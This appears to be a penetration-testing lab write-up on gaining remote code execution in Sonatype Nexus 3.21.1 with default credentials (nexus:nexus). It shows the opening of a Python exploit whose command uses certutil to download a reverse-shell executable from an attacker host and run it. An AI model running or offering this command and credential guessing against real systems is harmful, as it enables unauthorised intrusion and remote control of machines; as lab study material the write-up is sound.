Sonatype Nexus 3.21.1

This application is vulnerable to Remote Code Execution with valid credentials.

This is the catch in this case. We've got to try different default credentials, even nexus:nexus or if we are able to maybe see it in an SMB share or FTP server.

#!/usr/bin/python3

import sys
import base64
import requests

URL='http://192.168.143.61:8081'
CMD='cmd.exe /c certutil -urlcache -f http://192.168.49.143:80/lyethar-shell-reverse.exe lyethar-shell-reverse.exe && lyethar-shell-reverse.exe'
USERNAME='nexus'
PASSWORD='nexus'

The exploit requires you to send an cmd command which I just change it to make the computer get one of my files. Afterwards we would get a reverse shell.

PreviousZenPhoto 1.4.1.4 RCE NextArgus Surveillance DVR 4.0

Last updated 2 years ago